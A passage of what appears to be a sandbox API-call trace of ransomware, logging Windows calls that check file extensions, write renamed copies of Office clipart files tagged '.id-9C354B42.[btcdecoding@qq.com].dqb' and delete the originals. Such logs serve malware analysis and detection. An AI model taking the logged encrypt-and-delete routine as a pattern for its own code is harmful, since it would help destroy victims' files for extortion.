(lpString1=".pdf", lpString2=".GIF") returned 1 [0053.655] lstrlenW (lpString=".xls") returned 4 [0053.655] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.655] lstrlenW (lpString=".xlsx") returned 5 [0053.655] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.655] lstrlenW (lpString=".ppt") returned 4 [0053.655] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0053.655] lstrlenW (lpString=".zip") returned 4 [0053.655] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.655] lstrlenW (lpString=".rar") returned 4 [0053.655] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.655] lstrlenW (lpString=".bz2") returned 4 [0053.655] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.656] lstrlenW (lpString=".7z") returned 3 [0053.656] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0053.656] lstrlenW (lpString=".dbf") returned 4 [0053.656] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0053.656] lstrlenW (lpString=".1cd") returned 4 [0053.656] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0053.656] lstrlenW (lpString=".jpg") returned 4 [0053.656] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.656] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.656] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.657] GetLastError () returned 0x0 [0053.657] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x3d75, lpOverlapped=0x0) returned 1 [0053.660] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x3d80, lpOverlapped=0x0) returned 1 [0053.661] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.661] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.661] SetEndOfFile (hFile=0x240) returned 1 [0053.661] CloseHandle (hObject=0x240) returned 1 [0053.661] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.661] SetEndOfFile (hFile=0x23c) returned 1 [0053.662] CloseHandle (hObject=0x23c) returned 1 [0053.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.662] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif")) returned 1 [0053.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0053.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0053.663] lstrlenW (lpString=".doc") returned 4 [0053.663] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.663] lstrlenW (lpString=".docx") returned 5 [0053.663] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.663] lstrlenW (lpString=".pdf") returned 4 [0053.663] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.663] lstrlenW (lpString=".xls") returned 4 [0053.663] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.663] lstrlenW (lpString=".xlsx") returned 5 [0053.663] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.663] lstrlenW (lpString=".ppt") returned 4 [0053.663] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0053.663] lstrlenW (lpString=".zip") returned 4 [0053.663] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.663] lstrlenW (lpString=".rar") returned 4 [0053.663] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.663] lstrlenW (lpString=".bz2") returned 4 [0053.663] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.663] lstrlenW (lpString=".7z") returned 3 [0053.663] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0053.663] lstrlenW (lpString=".dbf") returned 4 [0053.663] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0053.663] lstrlenW (lpString=".1cd") returned 4 [0053.663] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0053.663] lstrlenW (lpString=".jpg") returned 4 [0053.663] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.664] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.664] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.664] GetLastError () returned 0x0 [0053.664] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x32b6, lpOverlapped=0x0) returned 1 [0053.763] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x32c0, lpOverlapped=0x0) returned 1 [0053.764] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.764] WriteFile (in: hFile=0x240, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.764] SetEndOfFile (hFile=0x240) returned 1 [0054.233] CloseHandle (hObject=0x240) returned 1 [0054.234] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.234] SetEndOfFile (hFile=0x23c) returned 1 [0055.138] CloseHandle (hObject=0x23c) returned 1 [0055.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.138] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf")) returned 1 [0055.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.139] lstrlenW (lpString=".doc") returned 4 [0055.139] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.139] lstrlenW (lpString=".docx") returned 5 [0055.139] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.139] lstrlenW (lpString=".pdf") returned 4 [0055.139] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.139] lstrlenW (lpString=".xls") returned 4 [0055.139] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.139] lstrlenW (lpString=".xlsx") returned 5 [0055.139] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.139] lstrlenW (lpString=".ppt") returned 4 [0055.139] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.139] lstrlenW (lpString=".zip") returned 4 [0055.139] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.139] lstrlenW (lpString=".rar") returned 4 [0055.139] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.139] lstrlenW (lpString=".bz2") returned 4 [0055.139] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.139] lstrlenW (lpString=".7z") returned 3 [0055.139] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.139] lstrlenW (lpString=".dbf") returned 4 [0055.139] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.139] lstrlenW (lpString=".1cd") returned 4 [0055.139] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.139] lstrlenW (lpString=".jpg") returned 4 [0055.139] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.140] GetFileSizeEx (in: hFile=0x23c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=9304) returned 1 [0055.140] CloseHandle (hObject=0x23c) returned 1 [0055.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf")) returned 0x20 [0055.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0055.140] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.140] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.140] GetLastError () returned 0x0 [0055.141] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2458, lpOverlapped=0x0) returned 1 [0055.349] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2460, lpOverlapped=0x0) returned 1 [0055.350] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.350] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.350] SetEndOfFile (hFile=0x178) returned 1 [0055.350] CloseHandle (hObject=0x178) returned 1 [0055.351] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.351] SetEndOfFile (hFile=0x23c) returned 1 [0055.352] CloseHandle (hObject=0x23c) returned 1 [0055.352] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.352] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf")) returned 1 [0055.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0055.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0055.352] lstrlenW (lpString=".doc") returned 4 [0055.352] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.352] lstrlenW (lpString=".docx") returned 5 [0055.352] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.352] lstrlenW (lpString=".pdf") returned 4 [0055.352] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.352] lstrlenW (lpString=".xls") returned 4 [0055.352] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.352] lstrlenW (lpString=".xlsx") returned 5 [0055.352] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.352] lstrlenW (lpString=".ppt") returned 4 [0055.352] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0055.352] lstrlenW (lpString=".zip") returned 4 [0055.353] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.353] lstrlenW (lpString=".rar") returned 4 [0055.353] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.353] lstrlenW (lpString=".bz2") returned 4 [0055.353] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.353] lstrlenW (lpString=".7z") returned 3 [0055.353] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0055.353] lstrlenW (lpString=".dbf") returned 4 [0055.353] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0055.353] lstrlenW (lpString=".1cd") returned 4 [0055.353] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0055.353] lstrlenW (lpString=".jpg") returned 4 [0055.353] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.353] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.353] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.354] GetLastError () returned 0x0 [0055.354] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xfb8, lpOverlapped=0x0) returned 1 [0055.364] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xfc0, lpOverlapped=0x0) returned 1 [0055.365] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.365] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.366] SetEndOfFile (hFile=0x178) returned 1 [0055.366] CloseHandle (hObject=0x178) returned 1 [0055.366] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.366] SetEndOfFile (hFile=0x23c) returned 1 [0055.367] CloseHandle (hObject=0x23c) returned 1 [0055.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.367] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf")) returned 1 [0055.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0055.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0055.367] lstrlenW (lpString=".doc") returned 4 [0055.367] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.367] lstrlenW (lpString=".docx") returned 5 [0055.367] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.367] lstrlenW (lpString=".pdf") returned 4 [0055.367] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.367] lstrlenW (lpString=".xls") returned 4 [0055.367] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.368] lstrlenW (lpString=".xlsx") returned 5 [0055.368] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.368] lstrlenW (lpString=".ppt") returned 4 [0055.368] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0055.368] lstrlenW (lpString=".zip") returned 4 [0055.368] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.368] lstrlenW (lpString=".rar") returned 4 [0055.368] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.368] lstrlenW (lpString=".bz2") returned 4 [0055.368] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.368] lstrlenW (lpString=".7z") returned 3 [0055.368] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0055.368] lstrlenW (lpString=".dbf") returned 4 [0055.368] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0055.368] lstrlenW (lpString=".1cd") returned 4 [0055.368] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0055.368] lstrlenW (lpString=".jpg") returned 4 [0055.368] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.368] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.368] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.369] GetLastError () returned 0x0 [0055.369] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x600, lpOverlapped=0x0) returned 1 [0055.383] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x610, lpOverlapped=0x0) returned 1 [0055.384] ReadFile (in: hFile=0x23c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.384] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.384] SetEndOfFile (hFile=0x178) returned 1 [0055.386] CloseHandle (hObject=0x178) returned 1 [0055.386] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.386] SetEndOfFile (hFile=0x23c) returned 1 [0055.387] CloseHandle (hObject=0x23c) returned 1 [0055.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf")) returned 1 [0055.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0055.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0055.390] lstrlenW (lpString=".doc") returned 4 [0055.390] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.390] lstrlenW (lpString=".docx") returned 5 [0055.391] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.391] lstrlenW (lpString=".pdf") returned 4 [0055.391] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.391] lstrlenW (lpString=".xls") returned 4 [0055.391] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.391] lstrlenW (lpString=".xlsx") returned 5 [0055.391] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.391] lstrlenW (lpString=".ppt") returned 4 [0055.391] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0055.391] lstrlenW (lpString=".zip") returned 4 [0055.391] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.391] lstrlenW (lpString=".rar") returned 4 [0055.391] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.391] lstrlenW (lpString=".bz2") returned 4 [0055.391] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.391] lstrlenW (lpString=".7z") returned 3 [0055.391] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0055.391] lstrlenW (lpString=".dbf") returned 4 [0055.391] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0055.391] lstrlenW (lpString=".1cd") returned 